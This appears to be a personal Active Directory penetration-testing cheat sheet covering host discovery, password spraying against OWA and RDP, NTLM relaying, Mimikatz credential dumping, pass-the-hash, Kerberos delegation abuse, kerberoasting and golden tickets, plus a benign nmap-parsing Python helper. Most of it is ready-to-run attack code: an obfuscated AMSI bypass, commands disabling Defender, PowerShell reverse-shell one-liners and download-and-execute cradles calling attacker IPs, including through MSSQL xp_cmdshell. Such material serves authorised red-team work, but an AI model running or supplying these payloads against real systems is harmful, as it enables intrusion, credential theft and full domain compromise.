# nmap -sn 10.10.10.0/24 -oN hosts.txt
or
Nessus host discovery
or
Fping
# fping 10.10.10.10
Network scan that sends one ping packet per IP
# fping -a -r 0 -g 10.10.10.0/24
4 ping packets per IP (-r for retry)
# fping -a -r 3 -g 10.10.10.0/24
Faster network scan by adding the "-i 1" switch (requires sudo; waits 1 ms between pings)
# sudo fping -a -i 1 -r 0 -g 10.10.10.0/24
Fast scan, but from a host-list
# sudo fping -a -i 1 -r 0 < iplist.txt
# nmap --open -p 445 -iL iplist.txt -oN smb_ipsonly.txt
Nmap does not always resolve DNS names, so two commands are needed to grab all the IPs.
// greps the IPs of hosts with resolved DNS names (the IP is in parentheses, field 6)
# cat ips-2_opensmb.txt | grep "report for" | cut -d " " -f 6 | grep -v -e '^$' | tr -d '()' > ips-2_ipsonly.txt
// greps the IPs of hosts without resolved DNS names (field 5), keeping only lines with digits and no letters
# cat smbopen_ips-1 | grep "report for" | cut -d " " -f 5 | grep '[0-9]' | grep -v '[a-z]' > smbips_only.txt
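As an added example (not part of the original cheat sheet), the same extraction done in one pass with a small Python parser for nmap's -oN (normal) format: it handles both the "name (IP)" and bare-IP forms of the "Nmap scan report for" line and also checks the reported port state, so the two greps above are not needed. The embedded scan output is constructed sample data, not a real scan.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of "nmap -oN" (normal) output; not a real scan. It mixes the
# two report-line shapes the cheat sheet greps for: "name (IP)" when nmap
# resolved a DNS name, and a bare IP when it did not.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.91 scan initiated Mon Jan  4 10:00:00 2021 as: nmap --open -p 445 -iL iplist.txt -oN smb.txt
Nmap scan report for dc01.example.local (10.10.10.5)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 10.10.10.7
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for fileserver.example.local (10.10.10.9)
Host is up (0.0030s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds

# Nmap done at Mon Jan  4 10:00:05 2021 -- 3 IP addresses (3 hosts up) scanned in 5.00 seconds
"""

# "Nmap scan report for <name> (<ip>)" or "Nmap scan report for <ip>"
REPORT_RE = re.compile(r"^Nmap scan report for (\S+)(?: \(([^)]+)\))?")
# "445/tcp open  microsoft-ds"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap_normal(text: str) -> List[Dict]:
    """Return one dict per host: ip, hostname (None if unresolved), and a
    {(port, proto): state} map of the ports nmap reported for it."""
    hosts: List[Dict] = []
    current: Optional[Dict] = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            first, in_parens = m.groups()
            if in_parens:            # resolved: name first, IP in parentheses
                hostname, ip = first, in_parens
            else:                    # unresolved: the first token is the IP
                hostname, ip = None, first
            current = {"ip": ip, "hostname": hostname, "ports": {}}
            hosts.append(current)
            continue
        pm = PORT_RE.match(line)
        if pm and current is not None:
            port, proto, state, _service = pm.groups()
            current["ports"][(int(port), proto)] = state
    return hosts


def ips_with_open_port(text: str, port: int, proto: str = "tcp") -> List[str]:
    """IPs (resolved or not) on which nmap reported the given port open."""
    return [h["ip"] for h in parse_nmap_normal(text)
            if h["ports"].get((port, proto)) == "open"]


if __name__ == "__main__":
    for ip in ips_with_open_port(SAMPLE_NMAP_OUTPUT, 445):
        print(ip)
```

Run it against a saved -oN file by reading the file into a string and passing it to ips_with_open_port; filtering on the port state means a host that nmap lists but reports as filtered or closed is not carried into the relay or spray list by mistake.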
- Create custom list of passwords like months, season, company name.
Using bash to add year and symbols, in this case "!"
# for i in $(cat wordlist.txt); do echo $i; echo ${i}2020; echo ${i}2020\!; done
or use hashcat's rule to mutate the passwords (optional).
- Do OSINT against the target company. LinkedIn and Google are good places to start.
- Harvest email addresses and create different naming conventions.
- Tools: MailSniper.ps1 (https://github.com/dafthack/MailSniper), Metasploit, https://github.com/byt3bl33d3r/SprayingToolkit
Internal or External domain enumeration:
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-DomainHarvestOWA -ExchHostname mail.domain.com -OutFile possibledomains.txt -CompanyName "Company A"
Username enumeration:
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-UsernameHarvestOWA -UserList .\userlist.txt -ExchHostname mail.domain.com -Domain domain.txt -OutFile possibleusernames.txt
With metasploit (timing attack):
msf5 > use auxiliary/scanner/http/owa_login
Password spraying (doable with metasploit's owa_login as well):
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\usernames.txt -Password Pa$$w0rd -Threads 15 -OutFile .\results.txt
EWS:
PS C:\Tools> Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\usernames.txt -Password Pa$$w0rd -Threads 15 -OutFile .\results.txt
- Assuming we got valid credentials
PS C:\Tools> Import-Module .\MailSniper.ps1
PS C:\Tools> Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Pa$$w0rd -OutFile .\GAL.txt
https://github.com/dafthack/MSOLSpray
- Tools: RDPassSpray.py (https://github.com/xFreed0m/RDPassSpray)
# python3 RDPassSpray.py -u chunk -p nocaptainchunk! -d EASY-CORE -t 10.10.10.10:<port>
# python3 RDPassSpray.py -U users.txt -P passwords.txt -d EASY-CORE -t 10.10.10.10:<port>
- Read /etc/resolv.conf from kali
- Run nmap on port 445 and 53
or from a domain joined machine:
# Get your ad domain
$DomainName = (Get-ADDomain).DNSRoot
# Get all DC's
$AllDCs = Get-ADDomainController -Filter * -Server $DomainName | Select-Object Hostname,Ipv4address,isglobalcatalog,site,forest,operatingsystem
# Or
$AllDCs = (Get-ADForest).GlobalCatalogs
- https://github.com/lgandx/Responder
- add -wrt for wpad, but don't run this for very long
- If relaying, turn off HTTP and SMB in Responder.conf
- logs: /usr/share/responder/logs
# responder -I eth0
- https://github.com/fox-it/mitm6
- I usually run nmap to discover hosts with SMB signing disabled or not required
# nmap -p137,139,445 --script smb-security-mode
or using CrackMapExec:
# crackmapexec smb 10.10.10.0/24 --gen-relay-list ipstoberelayed.txt
# python mitm6.py -l domain.local -v
# ntlmrelayx.py -6 -tf ipstoberelayed.txt
https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1
PS C:\tools> Out-CHM -PayloadURL http://10.10.10.10/nishang.ps1 -HHCPath "C:\tools"
Generating malicious office files with macro: https://github.com/curi0usJack/luckystrike
Good references:
- https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/
- https://npercoco.typepad.com/.a/6a0133f264aa62970b0240a4f06315200d-pi
- https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5
- https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/
- https://www.youtube.com/watch?v=WRrzX7cGHaY&feature=youtu.be&ab_channel=ColinHardy
or check my blog about client-side attacks: https://msry1.wordpress.com/2020/07/03/having-fun-with-client-side-attacks/
Download: git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
More flags: https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference
Password Spray:
# crackmapexec smb 10.10.10.10 -u userlists.txt -p Pa$$w0rd
Pass the hash:
# crackmapexec smb [IP] -u [user] -p [pass]| -H [hash]
Useful CME Flags:
- Domain Password Policy: --pass-pol
- Use local authentication: --local-auth
- Find SMB Shares: --shares
- Find Loot: --spider [Share Name] --depth [how deep, ie. 10] --pattern [ssn|password|credit] --shares | egrep -v "([-]|[+]|[*]|--|ADMIN|print|IPC|Default share|Remark)"
- Extract SAM: --sam
- Get LSA Secrets: --lsa
- Who is currently logged in: --loggedon-users
- Load a Module: -M ie. Mimikatz
- Extract NTDS: --ntds drsuapi
PS:\> query user
- Tools: PowerShdll (https://github.com/p3nt4/PowerShdll)
Checking current language mode:
PS C:\Tools> $ExecutionContext.SessionState.LanguageMode
Only works when CLM is set up locally.
PS C:\Tools> curl http://10.10.10.10/PowerShdll.dll -OutFile ps.dll
PS C:\Tools> rundll32.exe .\ps.dll, main -i
With Local Admin (GUI):
- Edit the system environment variables
- __PSLockDownPolicy set to 8
With Local Admin (CLI):
PS C:\Tools> Remove-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\" -name __PSLockdownPolicy
PS C:\Tools> setx _PSLockdownPolicy 0 /m
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
With ps.dll:
PS C:\Tools> curl http://10.10.10.10/amsibypass.ps1 -OutFile amsibypass.ps1
PS C:\Tools> $amsi = [IO.File]::ReadAllText(".\amsibypass.ps1")
PS C:\Tools> IEX $amsi
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
$command = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/nishang.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
Encode file content
[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\path\to\script.ps1')) | clip
Powershell -EncodedCommand $encodedCommand
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
- Tools: PowerView.ps1, PowerView_dev.ps1 (PowerView 3), PingCastle, ADRecon.ps1
- https://github.com/sense-of-security/ADRecon
- This generates nice .csv files we can parse
# rpcclient -U ""%"" 10.10.10.10 -c enumdomusers | cut -d" " -f1 | cut -d":" -f2 | tr -d "[]"
script:
#!/bin/bash
# Make bash array user-rids=()
# Change user, password, and domain
user_rids=( $(rpcclient -U ""%"" 10.163.193.1 -c enumdomusers | cut -d" " -f2 | cut -d":" -f2 | tr -d "[" | tr -d "]") )
# Change user, password, and domain
for i in "${user_rids[@]}"
do
rpcclient -U ""%"" 10.163.193.1 -c "queryuser $i"
done
PS C:\Tools> .\ADRecon.ps1
Enumerating Domain:
PS C:\Tools> Get-NetDomain -Domain domain.local
PS C:\Tools> Get-DomainSID
PS C:\Tools> (Get-DomainPolicy)."system access"
PS C:\Tools> Get-NetDomainController -Domain domain.local
Enumerating Trusts and Forest:
PS C:\Tools> Get-NetDomainTrust -Domain
PS C:\Tools> Get-NetForestCatalog
PS C:\Tools> Get-NetForest
PS C:\Tools> Get-NetForestDomain | Get-NetDomainTrust
Enumerating Users:
PS C:\Tools> Get-NetUser | select -ExpandProperty samaccountname | clip
PS C:\Tools> Get-UserProperty
PS C:\Tools> Find-UserField
Powerview_dev
PS C:\Tools> $Date = (Get-Date).AddYears(-1).ToFileTime()
PS C:\Tools> Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset | clip
Enumerating Group Membership of Users:
PS C:\Tools> Get-NetGroup -UserName admin | select cn | clip
Enumerating Groups:
- Use both PowerView and dev
PS C:\Tools> Get-NetGroup -Domain domain.local
PS C:\Tools> Get-NetGroup -GroupName "Domain Admins"
PS C:\Tools> Get-NetLocalGroup -ComputerName dt-dc -Recurse
PS C:\Tools> Get-NetLocalGroupMember -ComputerName DT-DC1.domain.local -GroupName "administrators"
Enumerating Group Members:
PS C:\Tools> Get-NetGroup -UserName admin
PS C:\Tools> Get-NetGroupMember -GroupName "Domain Admins"
PowerView dev:
PS C:\Tools> Get-NetGroupMember -Identity "Domain Admins" | select MemberName,MemberSID | clip
Enumerating Computers:
PS C:\Tools> Get-NetComputer
PS C:\Tools> Get-NetComputer -Ping
PS C:\Tools> Get-NetComputer -FullData
Enumerating Shares:
PS C:\Tools> Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC
PowerView dev:
PS C:\Tools> Find-InterestingDomainShareFile
Enumerating OU:
PS C:\Tools> Get-NetOU
PS C:\Tools> Get-NetOU myOUname | %{Get-NetComputer -ADSPath $_}
PowerView dev:
PS C:\Tools> Get-NetOU | select distinguishedname (do this first)
PS C:\Tools> Get-DomainComputer -SearchBase "OU=Domain Controllers,DC=dt,DC=domain,DC=local" | select name
Enumerating GPO:
PS C:\Tools> Get-NetGPO
PS C:\Tools> Get-NetGPO -ComputerName dt-dc
PS C:\Tools> Get-NetGPO | select flags,cn
PS C:\Tools> Get-NetGPO -GPOname "{xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}"
PS C:\Tools> (Get-NetOU testOU -FullData).gplink (Enumerate GPO applied on the testOU OU)
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
- Ctrl F for IdentityReference and ActiveDirectoryRights
PowerView dev:
PS C:\Tools> Get-DomainGPO -ComputerIdentity DT-DC | select displayname,cn
Enumerating hidden GPO:
PS C:\Tools> (([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
Enumerating ACL:
PS C:\Tools> Invoke-ACLScanner | select ObjectDN,ActiveDirectoryRights,IdentityReference
PS C:\Tools> Invoke-ACLScanner -ResolveGUIDs
PS C:\Tools> Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "admin"}
Enumerating objects with Unconstrained Delegation:
PS C:\Tools> Get-DomainComputer -Unconstrained | select cn
Enumerating objects with Constrained Delegation:
PS C:\Tools> Get-DomainUser -TrustedToAuth | select cn,useraccountcontrol,serviceprincipalname | fl
PS C:\Tools> Get-DomainComputer -TrustedToAuth | fl
https://github.com/ropnop/kerbrute
https://github.com/ropnop/kerbrute/releases/tag/v1.0.3
sudo ./kerbrute userenum -d <domain> <userList>
PingCastle (Version 2.8.1.0 2/23/2020 7:08:54 AM)
Get Active Directory Security at 80% in 20% of the time
End of support: 12/31/2021
Vincent LE TOUX ([email protected])
twitter: @mysmartlogon https://www.pingcastle.com
What do you want to do?
=======================
Using interactive mode.
Do not forget that there are other command line switches like --help that you can use
1-healthcheck-Score the risk of a domain
2-conso -Aggregate multiple reports into a single one
3-carto -Build a map of all interconnected domains
4-scanner -Perform specific security checks on workstations
5-advanced -Open the advanced menu
0-Exit
==============================
This is the main functionnality of PingCastle. In a matter of minutes, it produces a report which will give you an overview of your Active Directory security. This report can be generated on other domains by using the existing trust links.
Use the latest BloodHound 3 and Neo4j 4.1
PS C:\Tools> . .\SharpHound.ps1
PS C:\Tools> Invoke-BloodHound -CollectionMethod All
Hunting for Local Admin access: Tools: PowerView.ps1, Find-WMILocalAdminAccess.ps1, Find-PSRemotingLocalAdminAccess.ps1
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Find-LocalAdminAccess
PS C:\Tools> . .\Find-WMILocalAdminAccess.ps1
PS C:\Tools> Find-WMILocalAdminAccess
PS C:\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Tools> Find-PSRemotingLocalAdminAccess
PowerUp:
PS C:\Tools> . .\PowerUp.ps1
PS C:\Tools> Invoke-AllChecks
If we compromised a service account, check whether it has SeImpersonatePrivilege. If so, we can use JuicyPotato or RoguePotato to escalate to SYSTEM.
Juicy Potato:
PS C:\Tools> .\JuicyPotato.exe -l 7337 -t * -p C:\reports\53.exe -c '{8BC3F05E-D86B-11D0-A075-00C04FB68820}'
RoguePotato
https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
[dt-dc]: PS C:\Users\admin\Documents> $Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''http://192.168.50.147/nishang8080.ps1''))'
[dt-dc]: PS C:\Users\admin\Documents> Out-File -Encoding Ascii -InputObject $Contents -FilePath C:\Users\admin\Desktop\reverse.bat
[dt-dc]: PS C:\Users\admin\Documents> Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:92937945B518814341DE3F726500D4FF /run:C:\users\appadmin\desktop\reverse.bat"'
- This includes ways to defeat kerberos double-hop issue
Passing credentials (PSCREDENTIALS):
$password = ConvertTo-SecureString "Pa$$w0rd" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("domain\user", $password)
vs kerberos double hop in a nested request:
$cred = Get-Credential Contoso\Administrator
Invoke-Command -ComputerName ServerB -Credential $cred -ScriptBlock {
hostname
Invoke-Command -ComputerName ServerC -Credential $Using:cred -ScriptBlock {hostname}
}
PSRemoting:
PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dt-dc
Creating a session with credentials:
PS C:\Tools> $session = New-PSSession -ComputerName dt-dc -Credential domain\user
or
PS C:\Tools> $session = New-PSSession -ComputerName dt-dc -Credential (Get-Credential)
Nested PSRemoting (inside a PSRemoting session):
- Create a pscredential first, or do the Get-Credential technique
- Only works if our user has access to the other remote machine
[dc-computer] PS C:\Tools> $session = New-PSSession -ComputerName dt-computer1 -Credential domain\user
[dc-computer] PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -Session $session
- If we compromise a machine, we can enumerate its user's access to other machines via PowerView or Find-LocalAdminAccess.
- Usually, we don't have the plaintext password of the compromised user so we cannot do the nested psremoting with pscredentials.
- To get away with this, we need to get a reverse shell from the victim machine.
- Check "Reverse Shell from a PSSession" or "One Liner"
- Once we get
PS C:\Tools> $sess = New-PSSession dt-computer1
PS C:\Tools> Invoke-Command -ScriptBlock {whoami;hostname} -Session $sess
# crackmapexec smb [IP] -u [user] -p [pass]| -H [hash]
# evil-winrm.rb -i 10.10.10.10 -u user -H FB18AD18D520EA42025E3F676D325F23
# mimikatz.exe "sekurlsa::pth /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"
# Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"'
# psexec.py [email protected] -hashes :FB18AD18D520EA42025E3F676D325F23
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
# socat tcp-l:1515,fork tcp:10.10.10.10:3389
Example: from your Kali, reach port 80 on a server that only the foothold Windows machine can talk to
// this opens port 10000 on the foothold machine and forwards all traffic to port 80 of connectaddress
PS C:\Windows\system32> netsh interface portproxy add v4tov4 listenport=10000 connectport=80 connectaddress=10.10.10.10
// allow inbound port 10000 on the foothold machine's firewall
PS C:\Windows\system32> netsh firewall add portopening TCP 10000 "Open Port 10000"
// or turn off the firewall filtering entirely
PS C:\Windows\system32> netsh advfirewall set allprofiles state off
Browse footholdmachineip:10000
meterpreter > background
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 5
msf6 post(multi/manage/autoroute) > run
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks4
msf6 auxiliary(server/socks4a) > set srvhost 127.0.0.1
msf6 auxiliary(server/socks4a) > exploit -j
Then use proxychains to connect to the system
- This should show allowed directories where we can execute our own binaries
PS C:\Tools> (Get-AppLockerPolicy -Local).RuleCollections
PS C:\Tools> Get-AppLockerPolicy -Local -Effective -Xml | Set-Content ('C:\users\public\applockerpolicy.xml')
If AppLocker is configured with the default rules, these directories are allowed (and writable by normal users) by default:
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\Tasks
C:\windows\tracing
- Just like bash_history in Linux
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
- Kerberos is all about IMPERSONATION
A word about kerberos (credits to a youtube user "twaca")
One way to think of using Kerberos is to think of going to an amusement park. When you arrive at the park, you go to the main gate. You then proceed to the main ticket booth (the authentication server in the key distribution center) and purchase an all-day pass to the park (a ticket-granting ticket). You receive a purple wristband (because purple is the color for Wednesday) that indicates that you have paid your fee for that day and you have full access to the park. The colored wristband is good for all day. While in the park, you must purchase additional tickets for the rides. You walk up to a ticket booth (ticket-granting server) and the attendant notices that you have a purple wristband. You tell her you are wanting to ride the roller coaster. She issues you a ticket (session ticket) for the roller coaster. When you get to the roller coaster, the roller coaster attendant sees your purple wristband and accepts the ticket issued to you by the ticket seller. The roller coaster attendant does not need to check with the ticket seller because that is the only place you could have obtained that ticket. At the end of the day, when the park closes, the purple wristband for Wednesday no longer authenticates you. The wristband color for Thursday is orange. You also noticed that you did all the work. None of the ticket sellers or ride operators communicated with each other. It was up to you to procure tickets and walk around and distribute them. This is exactly the model as designed by MIT for Kerberos.
- If we have access to a computer with Unconstrained Delegation, we can potentially gain access to any user that authenticates to it, because their TGT is stored in its memory and can be used for impersonation.
If you have DC machine account's ticket via printer bug, do DCSync
https://medium.com/@riccardo.ancarani94/exploiting-unconstrained-delegation-a81eabbd6976
https://blog.stealthbits.com/unconstrained-delegation-permissions/
Tools: Rubeus, Mimikatz
Dump the tickets (check if there's any user we can impersonate) using Rubeus:
PS C:\Tools> Rubeus.exe dump
Mimikatz:
PS C:\Tools> Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
Injecting the ticket: Rubeus:
PS C:\Tools> .\Rubeus.exe ptt /ticket:base64ticket...
Mimikatz:
PS C:\Tools> Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'
PS C:\Tools> .\mimikatz "privilege::debug" "kerberos::ptt C:\path\to\ticket.kirbi
Monitor for the tickets:
C:\Tools> Rubeus.exe monitor /interval:5 /filteruser:TARGETDC$
Force machine account authentication:
C:\Tools> SpoolSample.exe TARGETDC01 FOOTHOLD01
Then inject the ticket with rubeus ptt.
Run DCSync
mimikatz # lsadump::dcsync /domain:domain.com /user:domain\krbtgt
- If we have access to any object with Constrained Delegation, this object with attribute "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION" can access a specific service. We can request any TGT for any users as long as they're not marked "Sensitive". We can inject the TGT and request more services for abuse.
Tools: Kekeo, Mimikatz, Rubeus
Converting plaintext creds to ntlm:
PS C:\Tools> .\Rubeus.exe hash /password:lab
kekeo # tgt::ask /user:admin /domain:domain.local /ntlm:FB18AD18D520EA42025E3F676D325F23 /ticket:admin.kirbi
kekeo # tgs::s4u /tgt:TGT
Injecting TGT using mimikatz:
mimikatz # kerberos::ptt TGT.kirbi
Using Rubeus:
.\Rubeus.exe s4u /user:dbservice /rc4:FB18AD18D520EA42025E3F676D325F23 /impersonateuser:Administrator /msdsspn:time/dt-dc.domain.local /altservice:cifs /ptt
PS C:\Tools> ls \\dt-dc.domain.local\c$
or request LDAP for DCSync
.\Rubeus.exe s4u /user:dbservice /rc4:FB18AD18D520EA42025E3F676D325F23 /impersonateuser:Administrator /msdsspn:time/dt-dc.domain.local /altservice:ldap /ptt
mimikatz # lsadump::dcsync /user:domain\Administrator
DCSync:
mimikatz # lsadump::dcsync /user:domain\Administrator
Tools: Rubeus
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.txt
Cracking:
PS C:\Tools> hashcat64.exe -m 13100 hashes.txt rockyou.txt
Tools: Rubeus
PS C:\Tools> .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
Cracking:
PS C:\Tools> hashcat64.exe -m 18200 hashes.txt rockyou.txt
Set pre-auth to on
powershell Set-DomainObject -Identity user1 -XOR @{useraccountcontrol=4194304} -Verbose
- Could be used to move laterally
- Could be used to exploit misconfigured MSSQL servers
Tools: PowerUpSQL (https://github.com/NetSPI/PowerUpSQL)
- https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
- https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3
Enumerate the live instances:
PS C:\Tools> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
Enumerate the links:
PS C:\Tools> Get-SQLServerLink -Instance mssql.instance.local
Crawl the links:
PS C:\Tools> Get-SQLServerLinkCrawl -Instance mssql.instance.local
- If we have sysadmin access to the end of the link, we can get a reverse shell using the following:
Get-SQLServerLinkCrawl -Instance mssql.instance.local -Query 'exec master..xp_cmdshell "powershell iex(new-object net.webclient).downloadstring(''http://192.168.50.147/nishang8080.ps1'')"'
or
Get-SQLServerLinkCrawl -Instance mssql.instance.local -Query 'exec master..xp_cmdshell "powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'
Tools: Mimikatz, ProcDump
- I usually prefer using one-liners that dump all the important hashes I need
PS C:\Tools> Invoke-Mimikatz -Command '"privilege::debug" "log .\Result.txt" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "log .\Result.txt" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets" exit
Against protected LSA (need mimidrv.sys on disk)
.\mimikatz.exe "privilege::debug" "log .\Result.txt" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "lsadump::secrets" exit
PS C:\Tools> Invoke-Mimikatz -dumpcreds
PS C:\Tools> Invoke-Mimikatz -command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe"'
PS C:\Tools> .\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:FB18AD18D520EA42025E3F676D325F23 /run:powershell.exe" exit
- This assumes that we compromised a domain that has a trust and we want to compromise the trusted domain
- Requires the domain trust hash or the krbtgt account hash
Method 1: Using the trust ticket
Extract the trust ticket and grab the hash of the trust domain.local → domain you want to compromise:
mimikatz# lsadump::trust /patch
Using mimikatz golden to impersonate the trust:
- sid: current domain's SID
- sids: target domain's SID + 519 (Enterprise Admins RID)
- rc4: trust ticket from lsadump::trust /patch (domain.local → target.domain.local)
PS C:\Tools> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /sids:S-1-5-21-XXX-519 /rc4:FB18AD18D520EA42025E3F676D325F23 /service:krbtgt /target:target.domain.local /ticket:C:\Tools\kekeo_old\target.kirbi"'
Next, ask tgs using the ticket generated above.
PS C:\Tools\kekeo_old> .\asktgs.exe .\target.kirbi CIFS/dt-dc.target.domain.local
Injecting the ticket:
PS C:\Tools> .\kirbikator.exe lsa .\CIFS/dt-dc.target.domain.local.kirbi
Check access:
PS C:\Tools> dir \\dt-dc.target.domain.local\c$
Method 2: Using krbtgt hash
Extract the krbtgt via dcsync or mimikatz
mimikatz# lsadump::lsa /patch
Same as method 1, using mimikatz golden module:
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /sids:S-1-5-21-XXX-500 /krbtgt:FB18AD18D520EA42025E3F676D325F23 /startoffset:0 /endin:600 /renewmax:10080
Next, convert the ticket to base64:
PS C:\Tools> [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\tools\ticket.kirbi"))
Pass the ticket using Rubeus:
PS C:\Tools> .\Rubeus.exe ptt /ticket:base64...
Best reference: https://adsecurity.org/?p=2011
This attack needs the machine account hash. Example: dt-dc$
